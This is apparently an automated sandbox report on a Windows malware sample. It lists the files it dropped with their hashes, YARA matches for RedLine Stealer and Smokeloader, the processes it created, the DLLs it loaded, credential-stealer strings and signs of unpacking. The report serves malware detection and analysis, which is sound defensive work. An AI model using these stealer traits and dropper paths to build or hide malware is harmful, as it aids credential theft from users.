Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048E9709 28_2_048E9709
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048CA007 28_2_048CA007
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0490C107 28_2_0490C107
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_04906217 28_2_04906217
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048C5247 28_2_048C5247
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048E438A 28_2_048E438A
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048FB3CA 28_2_048FB3CA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048E7368 28_2_048E7368
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0490ACA2 28_2_0490ACA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0490ADC2 28_2_0490ADC2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048E4B79 28_2_048E4B79
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll 2CAF66964F582A9A1ADD1F13205F8797F2F4E791D980000EA6B55C719C174ED2
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll 4D743335FF8CDF1E505F4BD82B0EFAFDE077B9BF0F88A615DB99FEADA880E3BA
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe C92EC1CEA5A09AF2F334A2E0D127F41827855C21C5E725AFB702EC29E705D1F3
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll 4D743335FF8CDF1E505F4BD82B0EFAFDE077B9BF0F88A615DB99FEADA880E3BA
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 0041B3D0 appears 123 times
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 02F5B637 appears 127 times
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 00420C62 appears 66 times
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 004212A0 appears 41 times
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 02F60EC9 appears 64 times
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 02F61507 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 02F0B637 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0041B3D0 appears 245 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048E0EC9 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048E1507 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420978 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420963 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0041ABB0 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0043C0B3 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420C62 appears 146 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 004212A0 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 02F10EC9 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 02F11507 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048DB637 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048E0BCA appears 48 times
One or more processes crash
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 732
Uses 32bit PE files
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0000001C.00000002.2886462605.0000000002E24000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1841496983.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000014.00000002.1848243926.0000000002F92000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1841617088.0000000002FF2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.2886785798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000014.00000002.1848101190.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/77@1/1
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02FF378E CreateToolhelp32Snapshot,Module32First, 0_2_02FF378E
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0040B385 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0040B385
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe File created: C:\Users\user\AppData\Roaming\810b84e2bfa3a9
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Mutant created: \Sessions\1\BaseNamedObjects\810b84e2bfa3a9e2d0d81a3d2ea89e46
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7652
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2120
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3484
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File created: C:\Users\user\AppData\Local\Temp\cbb1d94791 Jump to behavior
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe ReversingLabs: Detection: 78%
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Virustotal: Detection: 77%
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File read: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe "C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe"
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 732
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 780
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 848
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 908
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 908
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 920
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 1020
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 1080
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 1076
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe"
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 472
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 536
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 556
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 576
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 720
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 824
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 832
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.28.dr, cred64[1].dll.28.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Unpacked PE file: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 20.2.Dctooux.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 28.2.Dctooux.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Unpacked PE file: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 20.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 28.2.Dctooux.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0042F2A9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042F2A9
PE file contains sections with non-standard names
Source: cred64[1].dll.28.dr Static PE information: section name: _RDATA
Source: cred64.dll.28.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
